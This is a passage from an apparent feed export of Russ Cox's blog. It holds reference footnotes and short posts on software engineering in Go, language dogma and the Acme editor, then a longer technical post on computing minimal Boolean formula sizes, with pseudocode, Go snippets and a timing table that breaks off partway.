Adam Baldwin, “Details about the event-stream incident,” November 2018. <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident</a> <a class=fnref href='#fnref-18'>↩</a>
<li id=fn-19>
Russ Cox, “RE2: a principled approach to regular expression matching,” March 2010. <a href="https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html">https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html</a> <a class=fnref href='#fnref-19'>↩</a>
<li id=fn-20>
Rob Pike, “Go Proverbs,” November 2015. <a href="https://go-proverbs.github.io/">https://go-proverbs.github.io/</a> <a class=fnref href='#fnref-20'>↩</a>
<li id=fn-21>
U.S. House of Representatives Committee on Oversight and Government Reform, “The Equifax Data Breach,” Majority Staff Report, 115th Congress, December 2018. <a href="https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf">https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf</a> <a class=fnref href='#fnref-21'>↩</a>
<li id=fn-22>
Russ Cox, “The Principles of Versioning in Go,” GopherCon Singapore, May 2018. <a href="https://www.youtube.com/watch?v=F8nrpe0XWRg">https://www.youtube.com/watch?v=F8nrpe0XWRg</a> <a class=fnref href='#fnref-22'>↩</a>
<li id=fn-23>
Rob Pike, Sean Dorward, Robert Griesemer, and Sean Quinlan, “Interpreting the Data: Parallel Analysis with Sawzall,” <i>Scientific Programming Journal</i>, vol. 13 (2005). <a href="https://doi.org/10.1155/2005/962135">https://doi.org/10.1155/2005/962135</a> <a class=fnref href='#fnref-23'>↩</a>
</ol>
<a class=anchor href="#coda"><h2 id="coda">Coda</h2></a>
<p>
A version of this post was published
in <a href="https://queue.acm.org/detail.cfm?id=3344149">ACM Queue</a>
(March-April 2019) and then <a href="https://dl.acm.org/doi/pdf/10.1145/3347446">Communications of the ACM</a>
(August 2019) under the title “Surviving Software Dependencies.”
What is Software Engineering?tag:research.swtch.com,2012:research.swtch.com/vgo-eng2018-05-30T10:00:00-04:002018-05-30T10:02:00-04:00What is software engineering and what does Go mean by it? (Go & Versioning, Part 9)
<p>
Nearly all of Go’s distinctive design decisions
were aimed at making software engineering simpler and easier.
We’ve said this often.
The canonical reference is Rob Pike’s 2012 article,
“<a href="https://talks.golang.org/2012/splash.article">Go at Google: Language Design in the Service of Software Engineering</a>.”
But what is software engineering?<blockquote>
<p>
<i>Software engineering is what happens to programming
<br>
when you add time and other programmers.</i></blockquote>
<p>
Programming means getting a program working.
You have a problem to solve, you write some Go code,
you run it, you get your answer, you’re done.
That’s programming,
and that’s difficult enough by itself.
But what if that code has to keep working, day after day?
What if five other programmers need to work on the code too?
Then you start to think about version control systems,
to track how the code changes over time
and to coordinate with the other programmers.
You add unit tests,
to make sure bugs you fix are not reintroduced over time,
not by you six months from now,
and not by that new team member who’s unfamiliar with the code.
You think about modularity and design patterns,
to divide the program into parts that team members
can work on mostly independently.
You use tools to help you find bugs earlier.
You look for ways to make programs as clear as possible,
so that bugs are less likely.
You make sure that small changes can be tested quickly,
even in large programs.
You’re doing all of this because your programming
has turned into software engineering.
<p>
(This definition and explanation of software engineering
is my riff on an original theme by my Google colleague Titus Winters,
whose preferred phrasing is “software engineering is programming integrated over time.”
It’s worth seven minutes of your time to see
<a href="https://www.youtube.com/watch?v=tISy7EJQPzI&t=8m17s">his presentation of this idea at CppCon 2017</a>,
from 8:17 to 15:00 in the video.)
<p>
As I said earlier,
nearly all of Go’s distinctive design decisions
have been motivated by concerns about software engineering,
by trying to accommodate time and other programmers
into the daily practice of programming.
<p>
For example, most people think that we format Go code with <code>gofmt</code>
to make code look nicer or to end debates among
team members about program layout.
But the <a href="https://groups.google.com/forum/#!msg/golang-nuts/HC2sDhrZW5Y/7iuKxdbLExkJ">most important reason for <code>gofmt</code></a>
is that if an algorithm defines how Go source code is formatted,
then programs, like <code>goimports</code> or <code>gorename</code> or <code>go</code> <code>fix</code>,
can edit the source code more easily,
without introducing spurious formatting changes when writing the code back.
This helps you maintain code over time.
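<p>
For instance, a tool that rewrites Go source can hand its output to the
standard <code>go/format</code> package to produce exactly the canonical formatting,
so its edits introduce no spurious diffs.
This is only a sketch; the unformatted snippet is made up.
<pre class="indent">
package main

import (
	"fmt"
	"go/format"
)

func main() {
	// Source produced by some automated rewrite, with sloppy formatting.
	src := []byte("package main\nfunc main(){x:=1;_=x}\n")
	out, err := format.Source(src)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%s", out) // prints the same program, formatted as gofmt would
}
</pre>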
<p>
As another example, Go import paths are URLs.
If code said <code>import</code> <code>"uuid"</code>,
you’d have to ask which <code>uuid</code> package.
Searching for <code>uuid</code> on <a href="https://godoc.org">godoc.org</a> turns up dozens of packages.
If instead the code says <code>import</code> <code>"github.com/pborman/uuid"</code>,
now it’s clear which package we mean.
Using URLs avoids ambiguity
and also reuses an existing mechanism for giving out names,
making it simpler and easier to coordinate with other programmers.
<p>
Continuing the example,
Go import paths are written in Go source files,
not in a separate build configuration file.
This makes Go source files self-contained,
which makes it easier to understand, modify, and copy them.
These decisions, and more, were all made with the goal of
simplifying software engineering.
<p>
In later posts I will talk specifically about why
versions are important for software engineering
and how software engineering concerns motivate
the design changes from dep to vgo.
Go and Dogmatag:research.swtch.com,2012:research.swtch.com/dogma2017-01-09T09:00:00-05:002017-01-09T09:02:00-05:00Programming language dogmatics.
<p>
[<i>Cross-posting from last year’s <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">Go contributors AMA</a> on Reddit, because it’s still important to remember.</i>]
<p>
One of the perks of working on Go these past years has been the chance to have many great discussions with other language designers and implementers, for example about how well various design decisions worked out or the common problems of implementing what look like very different languages (for example both Go and Haskell need some kind of “green threads”, so there are more shared runtime challenges than you might expect). In one such conversation, when I was talking to a group of early Lisp hackers, one of them pointed out that these discussions are basically never dogmatic. Designers and implementers remember working through the good arguments on both sides of a particular decision, and they’re often eager to hear about someone else’s experience with what happens when you make that decision differently. Contrast that kind of discussion with the heated arguments or overly zealous statements you sometimes see from users of the same languages. There’s a real disconnect, possibly because the users don’t have the experience of weighing the arguments on both sides and don’t realize how easily a particular decision might have gone the other way.
<p>
Language design and implementation is engineering. We make decisions using evaluations of costs and benefits or, if we must, using predictions of those based on past experience. I think we have an important responsibility to explain both sides of a particular decision, to make clear that the arguments for an alternate decision are actually good ones that we weighed and balanced, and to avoid the suggestion that particular design decisions approach dogma. I hope <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">the Reddit AMA</a> as well as discussion on <a href="https://groups.google.com/group/golang-nuts">golang-nuts</a> or <a href="http://stackoverflow.com/questions/tagged/go">StackOverflow</a> or the <a href="https://forum.golangbridge.org/">Go Forum</a> or at <a href="https://golang.org/wiki/Conferences">conferences</a> help with that.
<p>
But we need help from everyone. Remember that none of the decisions in Go are infallible; they’re just our best attempts at the time we made them, not wisdom received on stone tablets. If someone asks why Go does X instead of Y, please try to present the engineering reasons fairly, including for Y, and avoid argument solely by appeal to authority. It’s too easy to fall into the “well that’s just not how it’s done here” trap. And now that I know about and watch for that trap, I see it in nearly every technical community, although some more than others.
A Tour of Acmetag:research.swtch.com,2012:research.swtch.com/acme2012-09-17T11:00:00-04:002012-09-17T11:00:00-04:00A video introduction to Acme, the Plan 9 text editor
<p class="lp">
People I work with recognize my computer easily:
it's the one with nothing but yellow windows and blue bars on the screen.
That's the text editor acme, written by Rob Pike for Plan 9 in the early 1990s.
Acme focuses entirely on the idea of text as user interface.
It's difficult to explain acme without seeing it, though, so I've put together
a screencast explaining the basics of acme and showing a brief programming session.
Remember as you watch the video that the 854x480 screen is quite cramped.
Usually you'd run acme on a larger screen: even my MacBook Air has almost four times
as much screen real estate.
</p>
<center>
<div style="border: 1px solid black; width: 853px; height: 480px;"><iframe width="853" height="480" src="https://www.youtube.com/embed/dP1xVpMPn8M?rel=0" frameborder="0" allowfullscreen></iframe></div>
</center>
<p class=pp>
The video doesn't show everything acme can do, nor does it show all the ways you can use it.
Even small idioms like where you type text to be loaded or executed vary from user to user.
To learn more about acme, read Rob Pike's paper “<a href="/acme.pdf">Acme: A User Interface for Programmers</a>” and then try it.
</p>
<p class=pp>
Acme runs on most operating systems.
If you use <a href="https://9p.io/">Plan 9 from Bell Labs</a>, you already have it.
If you use FreeBSD, Linux, OS X, or most other Unix clones, you can get it as part of <a href="http://swtch.com/plan9port/">Plan 9 from User Space</a>.
If you use Windows, I suggest trying acme as packaged in <a href="http://code.google.com/p/acme-sac/">acme stand alone complex</a>, which is based on the Inferno programming environment.
</p>
<p class=lp><b>Mini-FAQ</b>:
<ul>
<li><i>Q. Can I use scalable fonts?</i> A. On the Mac, yes. If you run <code>acme -f /mnt/font/Monaco/16a/font</code> you get 16-point anti-aliased Monaco as your font, served via <a href="http://swtch.com/plan9port/man/man4/fontsrv.html">fontsrv</a>. If you'd like to add X11 support to fontsrv, I'd be happy to apply the patch.
<li><i>Q. Do I need X11 to build on the Mac?</i> A. No. The build will complain that it cannot build ‘snarfer’ but it should complete otherwise. You probably don't need snarfer.
</ul>
<p class=pp>
If you're interested in history, the predecessor to acme was called help. Rob Pike's paper “<a href="/help.pdf">A Minimalist Global User Interface</a>” describes it. See also “<a href="/sam.pdf">The Text Editor sam</a>”
</p>
<p class=pp>
<i>Correction</i>: the smiley program in the video was written by Ken Thompson.
I got it from Dennis Ritchie, the more meticulous archivist of the pair.
</p>
Minimal Boolean Formulastag:research.swtch.com,2012:research.swtch.com/boolean2011-05-18T00:00:00-04:002011-05-18T00:00:00-04:00Simplify equations with God
<p><style type="text/css">
p { line-height: 150%; }
blockquote { text-align: left; }
pre.alg { font-family: sans-serif; font-size: 100%; margin-left: 60px; }
td, th { padding-left: 5px; padding-right: 5px; vertical-align: top; }
#times td { text-align: right; }
table { padding-top: 1em; padding-bottom: 1em; }
#find td { text-align: center; }
</style>
<p class=lp>
<a href="http://oeis.org/A056287">28</a>.
That's the minimum number of AND or OR operators
you need in order to write any Boolean function of five variables.
<a href="http://alexhealy.net/">Alex Healy</a> and I computed that in April 2010. Until then,
I believe no one had ever known that little fact.
This post describes how we computed it
and how we almost got scooped by <a href="http://research.swtch.com/2011/01/knuth-volume-4a.html">Knuth's Volume 4A</a>
which considers the problem for AND, OR, and XOR.
</p>
<h3>A Naive Brute Force Approach</h3>
<p class=pp>
Any Boolean function of two variables
can be written with at most 3 AND or OR operators: the parity function
on two variables X XOR Y is (X AND Y') OR (X' AND Y), where X' denotes
“not X.” We can shorten the notation by writing AND and OR
like multiplication and addition: X XOR Y = X*Y' + X'*Y.
</p>
<p class=pp>
For three variables, parity is also a hardest function, requiring 9 operators:
X XOR Y XOR Z = (X*Z'+X'*Z+Y')*(X*Z+X'*Z'+Y).
</p>
<p class=pp>
For four variables, parity is still a hardest function, requiring 15 operators:
W XOR X XOR Y XOR Z = (X*Z'+X'*Z+W'*Y+W*Y')*(X*Z+X'*Z'+W*Y+W'*Y').
</p>
<p class=pp>
The sequence so far prompts a few questions. Is parity always a hardest function?
Does the minimum number of operators alternate between 2<sup>n</sup>−1 and 2<sup>n</sup>+1?
</p>
<p class=pp>
I computed these results in January 2001 after hearing
the problem from Neil Sloane, who suggested it as a variant
of a similar problem first studied by Claude Shannon.
</p>
<p class=pp>
The program I wrote to compute a(4) computes the minimum number of
operators for every Boolean function of n variables
in order to find the largest minimum over all functions.
There are 2<sup>4</sup> = 16 settings of four variables, and each function
can pick its own value for each setting, so there are 2<sup>16</sup> different
functions. To make matters worse, you build new functions
by taking pairs of old functions and joining them with AND or OR.
2<sup>16</sup> different functions means 2<sup>16</sup>·2<sup>16</sup> = 2<sup>32</sup> pairs of functions.
</p>
<p class=pp>
The program I wrote was a mangling of the Floyd-Warshall
all-pairs shortest paths algorithm. That algorithm is:
</p>
<pre class="indent alg">
// Floyd-Warshall all pairs shortest path
func compute():
for each node i
for each node j
dist[i][j] = direct distance, or ∞
for each node k
for each node i
for each node j
d = dist[i][k] + dist[k][j]
if d < dist[i][j]
dist[i][j] = d
return
</pre>
<p class=lp>
The algorithm begins with the distance table dist[i][j] set to
an actual distance if i is connected to j and infinity otherwise.
Then each round updates the table to account for paths
going through the node k: if it's shorter to go from i to k to j,
it saves that shorter distance in the table. The nodes are
numbered from 0 to n, so the variables i, j, k are simply integers.
Because there are only n nodes, we know we'll be done after
the outer loop finishes.
</p>
<p class=pp>
The program I wrote to find minimum Boolean formula sizes is
an adaptation, substituting formula sizes for distance.
</p>
<pre class="indent alg">
// Algorithm 1
func compute()
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
loop
changed = false
for each function f
for each function g
d = size[f] + 1 + size[g]
if d < size[f OR g]
size[f OR g] = d
changed = true
if d < size[f AND g]
size[f AND g] = d
changed = true
if not changed
return
</pre>
<p class=lp>
Algorithm 1 runs the same kind of iterative update loop as the Floyd-Warshall algorithm,
but it isn't as obvious when you can stop, because you don't
know the maximum formula size beforehand.
So it runs until a round doesn't find any new functions to make,
iterating until it finds a fixed point.
</p>
<p class=pp>
The pseudocode above glosses over some details, such as
the fact that the per-function loops can iterate over a
queue of functions known to have finite size, so that each
loop omits the functions that aren't
yet known. That's only a constant factor improvement,
but it's a useful one.
</p>
<p class=pp>
Another important detail missing above
is the representation of functions. The most convenient
representation is a binary truth table.
For example,
if we are computing the complexity of two-variable functions,
there are four possible inputs, which we can number as follows.
</p>
<center>
<table>
<tr><th>X <th>Y <th>Value
<tr><td>false <td>false <td>00<sub>2</sub> = 0
<tr><td>false <td>true <td>01<sub>2</sub> = 1
<tr><td>true <td>false <td>10<sub>2</sub> = 2
<tr><td>true <td>true <td>11<sub>2</sub> = 3
</table>
</center>
<p class=pp>
The functions are then the 4-bit numbers giving the value of the
function for each input. For example, function 13 = 1101<sub>2</sub>
is true for all inputs except X=false Y=true.
Three-variable functions correspond to 3-bit inputs generating 8-bit truth tables,
and so on.
</p>
<p class=pp>
This representation has two key advantages. The first is that
the numbering is dense, so that you can implement a map keyed
by function using a simple array. The second is that the operations
“f AND g” and “f OR g” can be implemented using
bitwise operators: the truth table for “f AND g” is the bitwise
AND of the truth tables for f and g.
</p>
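<p class=pp>
For concreteness, here is a small Go sketch of this representation for
two-variable functions; the constant names are mine, not taken from the
original program.
</p>
<pre class="indent">
package main

import "fmt"

func main() {
	// Truth tables for two-variable functions: bit i holds the
	// function's value on input i, where i = 2*X + Y.
	const mask = 0b1111         // all four inputs
	const X, Y = 0b1100, 0b1010 // truth tables of the variables themselves
	notX, notY := mask^X, mask^Y

	// X XOR Y = (X AND Y') OR (X' AND Y): three AND/OR operators.
	xor := (X & notY) | (notX & Y)
	fmt.Printf("X xor Y has truth table %04b = function %d\n", xor, xor)
}
</pre>
<p class=lp>
Function 6 = 0110<sub>2</sub> is the parity table from above: true exactly on
inputs 1 and 2, where one variable is true and the other false.
</p>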
<p class=pp>
That program worked well enough in 2001 to compute the
minimum number of operators necessary to write any
1-, 2-, 3-, and 4-variable Boolean function. Each round
takes asymptotically O(2<sup>2<sup>n</sup></sup>·2<sup>2<sup>n</sup></sup>) = O(2<sup>2<sup>n+1</sup></sup>) time, and the number of
rounds needed is O(the final answer). The answer for n=4
is 15, so the computation required on the order of
15·2<sup>2<sup>5</sup></sup> = 15·2<sup>32</sup> iterations of the innermost loop.
That was plausible on the computer I was using at
the time, but the answer for n=5, likely around 30,
would need 30·2<sup>64</sup> iterations to compute, which
seemed well out of reach.
At the time, it seemed plausible that parity was always
a hardest function and that the minimum size would
continue to alternate between 2<sup>n</sup>−1 and 2<sup>n</sup>+1.
It's a nice pattern.
</p>
<h3>Exploiting Symmetry</h3>
<p class=pp>
Five years later, though, Alex Healy and I got to talking about this sequence,
and Alex shot down both conjectures using results from the theory
of circuit complexity. (Theorists!) Neil Sloane added this note to
the <a href="http://oeis.org/history?seq=A056287">entry for the sequence</a> in his Online Encyclopedia of Integer Sequences:
</p>
<blockquote>
<tt>
%E A056287 Russ Cox conjectures that X<sub>1</sub> XOR ... XOR X<sub>n</sub> is always a worst f and that a(5) = 33 and a(6) = 63. But (Jan 27 2006) Alex Healy points out that this conjecture is definitely false for large n. So what is a(5)?
</tt>
</blockquote>
<p class=lp>
Indeed. What is a(5)? No one knew, and it wasn't obvious how to find out.
</p>
<p class=pp>
In January 2010, Alex and I started looking into ways to
speed up the computation for a(5). 30·2<sup>64</sup> is too many
iterations but maybe we could find ways to cut that number.
</p>
<p class=pp>
In general, if we can identify a class of functions f whose
members are guaranteed to have the same complexity,
then we can save just one representative of the class as
long as we recreate the entire class in the loop body.
What used to be:
</p>
<pre class="indent alg">
for each function f
for each function g
visit f AND g
visit f OR g
</pre>
<p class=lp>
can be rewritten as
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
for each ff equivalent to f
for each gg equivalent to g
visit ff AND gg
visit ff OR gg
</pre>
<p class=lp>
That doesn't look like an improvement: it's doing all
the same work. But it can open the door to new optimizations
depending on the equivalences chosen.
For example, the functions “f” and “¬f” are guaranteed
to have the same complexity, by <a href="http://en.wikipedia.org/wiki/De_Morgan's_laws">DeMorgan's laws</a>.
If we keep just one of
those two on the lists that “for each function” iterates over,
we can unroll the inner two loops, producing:
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
visit f OR g
visit f AND g
visit ¬f OR g
visit ¬f AND g
visit f OR ¬g
visit f AND ¬g
visit ¬f OR ¬g
visit ¬f AND ¬g
</pre>
<p class=lp>
That's still not an improvement, but it's no worse.
Each of the two loops considers half as many functions
but the inner iteration is four times longer.
Now we can notice that half of the tests aren't
worth doing: “f AND g” is the negation of
“¬f OR ¬g,” and so on, so only half
of them are necessary.
</p>
<p class=pp>
Let's suppose that when choosing between “f” and “¬f”
we keep the one that is false when presented with all true inputs.
(This has the nice property that <code>f ^ (int32(f) >> 31)</code>
is the truth table for the canonical form of <code>f</code>.)
Then we can tell which combinations above will produce
canonical functions when f and g are already canonical:
</p>
<pre class="indent alg">
for each canonical function f
for each canonical function g
visit f OR g
visit f AND g
visit ¬f AND g
visit f AND ¬g
</pre>
<p class=lp>
That's a factor of two improvement over the original loop.
</p>
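<p class=pp>
In Go, that canonicalization is a one-liner on the 32-bit truth tables of
five-variable functions. This is a sketch of the trick, not code from the
original program.
</p>
<pre class="indent">
// canon returns the canonical representative of the pair {f, ¬f} for a
// five-variable function stored as a 32-bit truth table: whichever of
// the two is false on the all-true input, that is, has bit 31 clear.
func canon(f uint32) uint32 {
	// int32(f) >> 31 is 0 if bit 31 is clear and all ones if it is set,
	// so the XOR either leaves f alone or negates every bit.
	return f ^ uint32(int32(f) >> 31)
}
</pre>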
<p class=pp>
Another observation is that permuting
the inputs to a function doesn't change its complexity:
“f(V, W, X, Y, Z)” and “f(Z, Y, X, W, V)” will have the same
minimum size. For complex functions, each of the
5! = 120 permutations will produce a different truth table.
A factor of 120 reduction in storage is good but again
we have the problem of expanding the class in the
iteration. This time, there's a different trick for reducing
the work in the innermost iteration.
Since we only need to produce one member of
the equivalence class, it doesn't make sense to
permute the inputs to both f and g. Instead,
permuting just the inputs to f while fixing g
is guaranteed to hit at least one member
of each class that permuting both f and g would.
So we gain the factor of 120 twice in the loops
and lose it once in the iteration, for a net savings
of 120.
(In some ways, this is the same trick we did with “f” vs “¬f.”)
</p>
<p class=pp>
A final observation is that negating any of the inputs
to the function doesn't change its complexity,
because X and X' have the same complexity.
The same argument we used for permutations applies
here, for another constant factor of 2<sup>5</sup> = 32.
</p>
<p class=pp>
The code stores a single function for each equivalence class
and then recomputes the equivalent functions for f, but not g.
</p>
<pre class="indent alg">
for each canonical function f
for each function ff equivalent to f
for each canonical function g
visit ff OR g
visit ff AND g
visit ¬ff AND g
visit ff AND ¬g
</pre>
<p class=lp>
In all, we just got a savings of 2·120·32 = 7680,
cutting the total number of iterations from 30·2<sup>64</sup> = 5×10<sup>20</sup>
to 7×10<sup>16</sup>. If you figure we can do around
10<sup>9</sup> iterations per second, that's still 800 days of CPU time.
</p>
<p class=pp>
The full algorithm at this point is:
</p>
<pre class="indent alg">
// Algorithm 2
func compute():
for each function f
size[f] = ∞
for each single variable function f = v
size[f] = 0
loop
changed = false
for each canonical function f
for each function ff equivalent to f
for each canonical function g
d = size[ff] + 1 + size[g]
changed |= visit(d, ff OR g)
changed |= visit(d, ff AND g)
changed |= visit(d, ff AND ¬g)
changed |= visit(d, ¬ff AND g)
if not changed
return
func visit(d, fg):
if size[fg] != ∞
return false
record fg as canonical
for each function ffgg equivalent to fg
size[ffgg] = d
return true
</pre>
<p class=lp>
The helper function “visit” must set the size not only of its argument fg
but also all equivalent functions under permutation or inversion of the inputs,
so that future tests will see that they have been computed.
</p>
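<p class=pp>
That bookkeeping is mechanical bit shuffling on truth tables.
The following Go sketch shows the input-permutation and input-negation step
for five-variable functions; the function name and calling convention are
mine, not taken from the original program.
</p>
<pre class="indent">
// remap returns the truth table of f, a five-variable function stored
// as a 32-bit truth table, with its inputs permuted and selectively
// negated: the new function's value on input row i is f's value on the
// row built by sending bit b of i^neg to bit perm[b].
func remap(f uint32, perm [5]int, neg int) uint32 {
	var out uint32
	for i := 0; i < 32; i++ {
		j := 0
		for b := 0; b < 5; b++ {
			if (i^neg) & (1 << b) != 0 {
				j |= 1 << perm[b]
			}
		}
		out |= ((f >> j) & 1) << i
	}
	return out
}
</pre>
<p class=lp>
Calling remap with each of the 120 permutations and each of the 32 negation
masks, and also complementing each result, covers every member of a
function's equivalence class.
</p>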
<h3>Methodical Exploration</h3>
<p class=pp>
There's one final improvement we can make.
The approach of looping until things stop changing
considers each function pair multiple times
as their sizes go down. Instead, we can consider functions
in order of complexity, so that the main loop
builds first all the functions of minimum complexity 1,
then all the functions of minimum complexity 2,
and so on. If we do that, we'll consider each function pair at most once.
We can stop when all functions are accounted for.
</p>
<p class=pp>
Applying this idea to Algorithm 1 (before canonicalization) yields:
</p>
<pre class="indent alg">
// Algorithm 3
func compute()
    for each function f
        size[f] = ∞
    for each single variable function f = v
        size[f] = 0
    for k = 1 to ∞
        for each function f
            for each function g of size k − size(f) − 1
                if size[f AND g] == ∞
                    size[f AND g] = k
                    nsize++
                if size[f OR g] == ∞
                    size[f OR g] = k
                    nsize++
        if nsize == 2<sup>2<sup>n</sup></sup>
            return
</pre>
<p class=lp>
Applying the idea to Algorithm 2 (after canonicalization) yields:
</p>
<pre class="indent alg">
// Algorithm 4
func compute():
    for each function f
        size[f] = ∞
    for each single variable function f = v
        size[f] = 0
    for k = 1 to ∞
        for each canonical function f
            for each function ff equivalent to f
                for each canonical function g of size k − size(f) − 1
                    visit(k, ff OR g)
                    visit(k, ff AND g)
                    visit(k, ff AND ¬g)
                    visit(k, ¬ff AND g)
        if nvisited == 2<sup>2<sup>n</sup></sup>
            return

func visit(d, fg):
    if size[fg] != ∞
        return
    record fg as canonical
    for each function ffgg equivalent to fg
        if size[ffgg] == ∞
            size[ffgg] = d
            nvisited += 2 // counts ffgg and ¬ffgg
    return
</pre>
<p class=lp>
The original loop in Algorithms 1 and 2 considered each pair f, g in every
iteration of the loop after they were computed.
The new loop in Algorithms 3 and 4 considers each pair f, g only once,
when k = size(f) + size(g) + 1. This removes the
leading factor of 30 (the number of times we
expected the first loop to run) from our estimation
of the run time.
Now the expected number of iterations is around
2<sup>64</sup>/7680 = 2.4×10<sup>15</sup>. If we can do 10<sup>9</sup> iterations
per second, that's only 28 days of CPU time,
which I can deliver if you can wait a month.
</p>
<p class=pp>
Our estimate does not include the fact that not all function pairs need
to be considered. For example, if the maximum size is 30, then the
functions of size 14 need never be paired against the functions of size 16,
because any result would have size 14+1+16 = 31.
So even 2.4×10<sup>15</sup> is an overestimate, but it's in the right ballpark.
(With hindsight I can report that only 1.7×10<sup>14</sup> pairs need to be considered
but also that our estimate of 10<sup>9</sup> iterations
per second was optimistic. The actual calculation ran for 20 days,
an average of about 10<sup>8</sup> iterations per second.)
</p>
<h3>Endgame: Directed Search</h3>
<p class=pp>
A month is still a long time to wait, and we can do better.
Near the end (after k is bigger than, say, 22), we are exploring
the fairly large space of function pairs in hopes of finding a
fairly small number of remaining functions.
At that point it makes sense to change from the
bottom-up “bang things together and see what we make”
to the top-down “try to make this one of these specific functions.”
That is, the core of the current search is:
</p>
<pre class="indent alg">
for each canonical function f
    for each function ff equivalent to f
        for each canonical function g of size k − size(f) − 1
            visit(k, ff OR g)
            visit(k, ff AND g)
            visit(k, ff AND ¬g)
            visit(k, ¬ff AND g)
</pre>
<p class=lp>
We can change it to:
</p>
<pre class="indent alg">
for each missing function fg
    for each canonical function g
        for all possible f such that one of these holds
              * fg = f OR g
              * fg = f AND g
              * fg = ¬f AND g
              * fg = f AND ¬g
            if size[f] == k − size(g) − 1
                visit(k, fg)
                next fg
</pre>
<p class=lp>
By the time we're at the end, exploring all the possible f to make
the missing functions—a directed search—is much less work than
the brute force of exploring all combinations.
</p>
<p class=pp>
As an example, suppose we are looking for f such that fg = f OR g.
The equation is only possible to satisfy if fg OR g == fg.
That is, if g has any extraneous 1 bits, no f will work, so we can move on.
Otherwise, the remaining condition is that
f AND ¬g == fg AND ¬g. That is, for the bit positions where g is 0, f must match fg.
The other bits of f (the bits where g has 1s)
can take any value.
We can enumerate the possible f values by recursively trying all
possible values for the “don't care” bits.
</p>
<pre class="indent alg">
func find(x, any, xsize):
    if size(x) == xsize
        return x
    while any != 0
        bit = any AND −any // rightmost 1 bit in any
        any = any AND ¬bit
        if f = find(x OR bit, any, xsize) succeeds
            return f
    return failure
</pre>
<p class=lp>
It doesn't matter which 1 bit we choose for the recursion,
but finding the rightmost 1 bit is cheap: it is isolated by the
(admittedly surprising) expression “any AND −any.”
In two's-complement arithmetic, −any is ¬any + 1, which complements
every bit above the rightmost 1 and leaves that 1 (and the zeros below it)
unchanged, so the only bit set in both any and −any is the rightmost 1.
</p>
<p class=pp>
Given <code>find</code>, the loop above can try these four cases:
</p>
<center>
<table id=find>
<tr><th>Formula <th>Condition <th>Base x <th>“Any” bits
<tr><td>fg = f OR g <td>fg OR g == fg <td>fg AND ¬g <td>g
<tr><td>fg = f OR ¬g <td>fg OR ¬g == fg <td>fg AND g <td>¬g
<tr><td>¬fg = f OR g <td>¬fg OR g == ¬fg <td>¬fg AND ¬g <td>g
<tr><td>¬fg = f OR ¬g <td>¬fg OR ¬g == ¬fg <td>¬fg AND g <td>¬g
</table>
</center>
<p class=lp>
Rewriting the Boolean expressions to use only the four OR forms
means that we only need to write the “adding bits” version of find.
</p>
<p class=pp>
The final algorithm is:
</p>
<pre class="indent alg">
// Algorithm 5
func compute():
    for each function f
        size[f] = ∞
    for each single variable function f = v
        size[f] = 0

    // Generate functions.
    for k = 1 to max_generate
        for each canonical function f
            for each function ff equivalent to f
                for each canonical function g of size k − size(f) − 1
                    visit(k, ff OR g)
                    visit(k, ff AND g)
                    visit(k, ff AND ¬g)
                    visit(k, ¬ff AND g)

    // Search for functions.
    for k = max_generate+1 to ∞
        for each missing function fg
            for each canonical function g
                fsize = k − size(g) − 1
                if fg OR g == fg
                    if f = find(fg AND ¬g, g, fsize) succeeds
                        visit(k, fg)
                        next fg
                if fg OR ¬g == fg
                    if f = find(fg AND g, ¬g, fsize) succeeds
                        visit(k, fg)
                        next fg
                if ¬fg OR g == ¬fg
                    if f = find(¬fg AND ¬g, g, fsize) succeeds
                        visit(k, fg)
                        next fg
                if ¬fg OR ¬g == ¬fg
                    if f = find(¬fg AND g, ¬g, fsize) succeeds
                        visit(k, fg)
                        next fg
        if nvisited == 2<sup>2<sup>n</sup></sup>
            return

func visit(d, fg):
    if size[fg] != ∞
        return
    record fg as canonical
    for each function ffgg equivalent to fg
        if size[ffgg] == ∞
            size[ffgg] = d
            nvisited += 2 // counts ffgg and ¬ffgg
    return

func find(x, any, xsize):
    if size(x) == xsize
        return x
    while any != 0
        bit = any AND −any // rightmost 1 bit in any
        any = any AND ¬bit
        if f = find(x OR bit, any, xsize) succeeds
            return f
    return failure
</pre>
<p class=lp>
To get a sense of the speedup here, and to check my work,
I ran the program using both algorithms
on a 2.53 GHz Intel Core 2 Duo E7200.
</p>
<center>
<table id=times>
<tr><th> <th colspan=3>————— # of Functions —————<th colspan=2>———— Time ————
<tr><th>Size <th>Canonical <th>All <th>All, Cumulative <th>Generate <th>Search
<tr><td>0 <td>1 <td>10 <td>10
<tr><td>1 <td>2 <td>82 <td>92 <td>< 0.1 seconds <td>3.4 minutes
<tr><td>2 <td>2 <td>640 <td>732 <td>< 0.1 seconds <td>7.2 minutes
<tr><td>3 <td>7 <td>4420 <td>5152 <td>< 0.1 seconds <td>12.3 minutes
<tr><td>4 <td>19 <td>25276 <td>29696 <td>< 0.1 seconds <td>30.1 minutes
<tr><td>5 <td>44 <td>117440 <td>147136 <td>< 0.1 seconds <td>1.3 hours
<tr><td>6 <td>142 <td>515040 <td>662176 <td>< 0.1 seconds <td>3.5 hours
<tr><td>7 <td>436 <td>1999608 <td>2661784 <td>0.2 seconds <td>11.6 hours
<tr><td>8 <td>1209 <td>6598400 <td>9260184 <td>0.6 seconds <td>1.7 days
<tr><td>9 <td>3307 <td>19577332 <td>28837516 <td>1.7 seconds <td>4.9 days
<tr><td>10 <td>7741 <td>50822560 <td>79660076 <td>4.6 seconds <td>[ 10 days ? ]
<tr><td>11 <td>17257 <td>114619264 <td>194279340 <td>10.8 seconds <td>[ 20 days ? ]
<tr><td>12 <td>31851 <td>221301008 <td>415580348 <td>21.7 seconds <td>[ 50 days ? ]
<tr><td>13 <td>53901 <td>374704776 <td>790285124 <td>38.5 seconds <td>[ 80 days ? ]
